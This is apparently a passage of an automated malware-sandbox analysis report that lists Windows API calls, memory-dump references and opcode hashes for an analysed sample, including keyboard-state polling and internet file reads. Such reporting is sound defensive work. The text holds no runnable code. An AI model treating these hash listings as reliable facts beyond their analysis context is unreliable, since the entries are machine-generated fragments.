                                                                                  • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0023AB79,00000000,00000000), ref: 00256C98
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00256CC7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Long$MessageSendShow
                                                                                  • String ID:
                                                                                  • API String ID: 3688381893-0
                                                                                  • Opcode ID: cf091300ed512daee8067475e1b068f83125819cabc3ccf7267d6a843b65a794
                                                                                  • Instruction ID: a3c7f8a7beb50320948bab4a6e52ba0e758f6646dc8fd7a8d3e728c9ec746821
                                                                                  • Opcode Fuzzy Hash: cf091300ed512daee8067475e1b068f83125819cabc3ccf7267d6a843b65a794
                                                                                  • Instruction Fuzzy Hash: 68411B35624205AFD724CF68CC5CFB97BA5EB09362F940229FC95A72E0D371ED64CA48
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID:
                                                                                  • API String ID: 269201875-0
                                                                                  • Opcode ID: f4e2aa88d4e0574ce4433acebe61a556041aa9b8079852eaab6aebf4d5dab5e6
                                                                                  • Instruction ID: 19a042b6a6dcd2beb3a74db86438ebc35cd95463e4deae660f2a4da9110c383d
                                                                                  • Opcode Fuzzy Hash: f4e2aa88d4e0574ce4433acebe61a556041aa9b8079852eaab6aebf4d5dab5e6
                                                                                  • Instruction Fuzzy Hash: 6B41D476A002089FCB24DF78C881AADB7F5EF99314F2545A9E615EB391DB31ED01CB90
                                                                                  APIs
                                                                                  • GetCursorPos.USER32(?), ref: 001D9141
                                                                                  • ScreenToClient.USER32(00000000,?), ref: 001D915E
                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 001D9183
                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 001D919D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                  • String ID:
                                                                                  • API String ID: 4210589936-0
                                                                                  • Opcode ID: 13acaad4d86cdc992faf29d04923197ebdcf83fada6ceff03ee5be5b9c9f59de
                                                                                  • Instruction ID: 247e82d0734d7c5a024e2606eefa789bf1e7388cf18de337d50f21e775473063
                                                                                  • Opcode Fuzzy Hash: 13acaad4d86cdc992faf29d04923197ebdcf83fada6ceff03ee5be5b9c9f59de
                                                                                  • Instruction Fuzzy Hash: 01415F7191860BFBDF199F64C848BEEB7B4FB55320F204216E429A22D0D77469A4CF91
                                                                                  APIs
                                                                                  • GetInputState.USER32 ref: 002338CB
                                                                                  • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00233922
                                                                                  • TranslateMessage.USER32(?), ref: 0023394B
                                                                                  • DispatchMessageW.USER32(?), ref: 00233955
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00233966
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                  • String ID:
                                                                                  • API String ID: 2256411358-0
                                                                                  • Opcode ID: cf8751382f68c03e4ccbdc484806d2f3a0dfbe7696c413543167a4a51fc6bc8c
                                                                                  • Instruction ID: c575aefcba9e02400868a35cfcfa4e8f297f89da694805fd8b8f2cb6e7cb5aae
                                                                                  • Opcode Fuzzy Hash: cf8751382f68c03e4ccbdc484806d2f3a0dfbe7696c413543167a4a51fc6bc8c
                                                                                  • Instruction Fuzzy Hash: EA31B2B0928343DEEB35CF75A84DBB637A8EB05305F14056EE462C61A0E7F49BA5CB11
                                                                                  APIs
                                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0023C21E,00000000), ref: 0023CF38
                                                                                  • InternetReadFile.WININET(?,00000000,?,?), ref: 0023CF6F
                                                                                  • GetLastError.KERNEL32(?,00000000,?,?,?,0023C21E,00000000), ref: 0023CFB4
                                                                                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,0023C21E,00000000), ref: 0023CFC8
                                                                                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,0023C21E,00000000), ref: 0023CFF2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                  • String ID:
                                                                                  • API String ID: 3191363074-0
                                                                                  • Opcode ID: b3445a91c94abe8c1e6d3aad7d8dbffdd8325b842b1e77e4dd03236c17a9c0b4
                                                                                  • Instruction ID: 3ab12a174a3709d115fa27013738427643cc9d355cf72fa29f7f179932fd03be
                                                                                  • Opcode Fuzzy Hash: b3445a91c94abe8c1e6d3aad7d8dbffdd8325b842b1e77e4dd03236c17a9c0b4
                                                                                  • Instruction Fuzzy Hash: 1D317FB1510706AFDB20DFA5D884AABBBF9EB14311F20442FF506E2511E730EE51DB60
                                                                                  APIs
                                                                                  • GetWindowRect.USER32(?,?), ref: 00221915
                                                                                  • PostMessageW.USER32(00000001,00000201,00000001), ref: 002219C1
                                                                                  • Sleep.KERNEL32(00000000,?,?,?), ref: 002219C9
                                                                                  • PostMessageW.USER32(00000001,00000202,00000000), ref: 002219DA
                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?), ref: 002219E2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3382505437-0
                                                                                  • Opcode ID: 1c6f37c15467f7c6cfe57dbc135f73760f9f91b55d9471271849e8060f5368f7
                                                                                  • Instruction ID: 5ae5edf6fbb98cdcbbe4003eaf522ab3c9a07f1513447deecc05a8b3295f0cd0
                                                                                  • Opcode Fuzzy Hash: 1c6f37c15467f7c6cfe57dbc135f73760f9f91b55d9471271849e8060f5368f7
                                                                                  • Instruction Fuzzy Hash: D531D171910229EFCB04CFA8ED99EDE3BB5EB54315F104225F921A72D0D7709AA4CB90
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00255745
                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 0025579D
                                                                                  • _wcslen.LIBCMT ref: 002557AF
                                                                                  • _wcslen.LIBCMT ref: 002557BA
                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00255816
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 763830540-0
                                                                                  • Opcode ID: 6f1eefb0b637d5fcec3b18f112b4f75193a683a65a43ee3fcfcb483aa73aacc5
                                                                                  • Instruction ID: 6002edadea877458de6aed875dbdc676e1d4a6df9081da946f3a183c4e9b3296
                                                                                  • Opcode Fuzzy Hash: 6f1eefb0b637d5fcec3b18f112b4f75193a683a65a43ee3fcfcb483aa73aacc5
                                                                                  • Instruction Fuzzy Hash: 5F21A531924629DBDB208FA1DC84AEDB7BCFF44326F108216FD19EA180D7708A99CF54
                                                                                  APIs
                                                                                  • IsWindow.USER32(00000000), ref: 00240951
                                                                                  • GetForegroundWindow.USER32 ref: 00240968
                                                                                  • GetDC.USER32(00000000), ref: 002409A4
                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 002409B0
                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 002409E8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                  • String ID:
                                                                                  • API String ID: 4156661090-0
                                                                                  • Opcode ID: ca51f87acb265395cf9a42cffd4944c3d3fb49bb09ff28c9a0c921e0438f7103
                                                                                  • Instruction ID: 3ecfca3c4c54346bf11ca41def619fc798155af6cb79b205491e66740cec8d83
                                                                                  • Opcode Fuzzy Hash: ca51f87acb265395cf9a42cffd4944c3d3fb49bb09ff28c9a0c921e0438f7103
                                                                                  • Instruction Fuzzy Hash: 8721A175610214AFD704EF64D889AAEBBE9EF58B01F10842CE94AD7352DB30ED44CB50
                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 001FCDC6
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001FCDE9
                                                                                    • Part of subcall function 001F3820: RtlAllocateHeap.NTDLL(00000000,?,00291444,?,001DFDF5,?,?,001CA976,00000010,00291440,001C13FC,?,001C13C6,?,001C1129), ref: 001F3852
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001FCE0F
                                                                                  • _free.LIBCMT ref: 001FCE22
                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001FCE31
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                  • String ID:
                                                                                  • API String ID: 336800556-0
                                                                                  • Opcode ID: 496e51a78573e1578a83d204c6c237f7e578d0fa4ea5a0f883a472e4a56fe54c
                                                                                  • Instruction ID: 3c3deb135967bfa39a3c9da4ffd3a2d6cbffa50a1be6e9ab8e304e0186a9be01
                                                                                  • Opcode Fuzzy Hash: 496e51a78573e1578a83d204c6c237f7e578d0fa4ea5a0f883a472e4a56fe54c
                                                                                  • Instruction Fuzzy Hash: 78018472A0171D7F232116B66D8CDBB6D6DEEC6BA13254129FA05C7202EB718D01A1F4
                                                                                  APIs
                                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001D9693
                                                                                  • SelectObject.GDI32(?,00000000), ref: 001D96A2
                                                                                  • BeginPath.GDI32(?), ref: 001D96B9
                                                                                  • SelectObject.GDI32(?,00000000), ref: 001D96E2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                  • String ID:
                                                                                  • API String ID: 3225163088-0
                                                                                  • Opcode ID: 9e1de34f1a3dcf8282f97a83d8f7d330b1570a85ef39407f0378054da4ba68ca
                                                                                  • Instruction ID: e4a6ba5beb32ec6c64d5aa9c311a0777ec94a008978409e27b7060d7b95e1f7e
                                                                                  • Opcode Fuzzy Hash: 9e1de34f1a3dcf8282f97a83d8f7d330b1570a85ef39407f0378054da4ba68ca
                                                                                  • Instruction Fuzzy Hash: 33215E70802346EFEB119F66FC1C7A97BB8BB50366F204217F415A62B0D37098A5CF94
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memcmp
                                                                                  • String ID:
                                                                                  • API String ID: 2931989736-0
                                                                                  • Opcode ID: 381bf7afbfe4eb63fe7e42192c664304a765578427c85f04a52394277add7e93
                                                                                  • Instruction ID: 56e44ea77515000ff982094f240f7f1af057304ed2e14890a7baf043193987e2
                                                                                  • Opcode Fuzzy Hash: 381bf7afbfe4eb63fe7e42192c664304a765578427c85f04a52394277add7e93
                                                                                  • Instruction Fuzzy Hash: 930196716E1A75BA92189551AE42FBBB35DAB353A5B048031FD049E241F770ED3482A4
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,?,001EF2DE,001F3863,00291444,?,001DFDF5,?,?,001CA976,00000010,00291440,001C13FC,?,001C13C6), ref: 001F2DFD
                                                                                  • _free.LIBCMT ref: 001F2E32
                                                                                  • _free.LIBCMT ref: 001F2E59
                                                                                  • SetLastError.KERNEL32(00000000,001C1129), ref: 001F2E66
                                                                                  • SetLastError.KERNEL32(00000000,001C1129), ref: 001F2E6F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free
                                                                                  • String ID:
                                                                                  • API String ID: 3170660625-0
                                                                                  • Opcode ID: 087f4ec3083b42ea159a8d66198e971244720b6c72845ed0532481c96f8902b0
                                                                                  • Instruction ID: 124fe56c696c221e24dcb034a45d9ce5f59eb1b42234aef833b7ab4236e33678
                                                                                  • Opcode Fuzzy Hash: 087f4ec3083b42ea159a8d66198e971244720b6c72845ed0532481c96f8902b0
                                                                                  • Instruction Fuzzy Hash: 1001A476245B0C7BC72267747C89D3B2A59ABE17A5B354129FB25A3293EB748C014120
                                                                                  APIs
                                                                                  • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0021FF41,80070057,?,?,?,0022035E), ref: 0022002B
                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0021FF41,80070057,?,?), ref: 00220046
                                                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0021FF41,80070057,?,?), ref: 00220054
                                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0021FF41,80070057,?), ref: 00220064
                                                                                  • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0021FF41,80070057,?,?), ref: 00220070
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 3897988419-0
                                                                                  • Opcode ID: 3199e9e91416edd167a411ddc49391681d5dfe5def882292ffe088dafad479f7
                                                                                  • Instruction ID: 4b2b28b2fd0e25cbbfd17d40a662a34bf0101d79633653d9b6c7dbabb8f7779d
                                                                                  • Opcode Fuzzy Hash: 3199e9e91416edd167a411ddc49391681d5dfe5def882292ffe088dafad479f7
                                                                                  • Instruction Fuzzy Hash: 8C01A272610325BFEB114FA8FC8CBAA7AEDEF44752F244124F905D2221E771DE508BA4
                                                                                  APIs
                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 0022E997
                                                                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 0022E9A5
                                                                                  • Sleep.KERNEL32(00000000), ref: 0022E9AD
                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 0022E9B7
                                                                                  • Sleep.KERNEL32 ref: 0022E9F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                  • String ID:
                                                                                  • API String ID: 2833360925-0
                                                                                  • Opcode ID: a9dccea230f491d3cb3012da9fe104b44c9967fbe596e97d220213b8cfdbf1a4
                                                                                  • Instruction ID: b3094699a65f65844369cb9aa86aaed3f40a16c302ae3351fa485158e23da7aa
                                                                                  • Opcode Fuzzy Hash: a9dccea230f491d3cb3012da9fe104b44c9967fbe596e97d220213b8cfdbf1a4
                                                                                  • Instruction Fuzzy Hash: 32015B31C11739EBCF00AFE4E85D6DDBB78BF08701F114556E906B2241DB3495A4DBA6
                                                                                  APIs
                                                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00221114
                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,00220B9B,?,?,?), ref: 00221120
                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00220B9B,?,?,?), ref: 0022112F
                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00220B9B,?,?,?), ref: 00221136
                                                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0022114D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                  • String ID:
                                                                                  • API String ID: 842720411-0
                                                                                  • Opcode ID: a81b5988fbff8ebc1d90cdcd0aeff2ed299fb6e7b694084b92fb72dc74ef496f
                                                                                  • Instruction ID: c4254b31f0055c6f113cff1c15946cbe57060cffd951ecb714a3097609df0ca1
                                                                                  • Opcode Fuzzy Hash: a81b5988fbff8ebc1d90cdcd0aeff2ed299fb6e7b694084b92fb72dc74ef496f
                                                                                  • Instruction Fuzzy Hash: 26011D75100715BFDB114FA5EC4DE6A3F6EEF89361B204425FA45D7350EA31DC20DA64
                                                                                  APIs
                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00220FCA
                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00220FD6
                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00220FE5
                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00220FEC
                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00221002
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
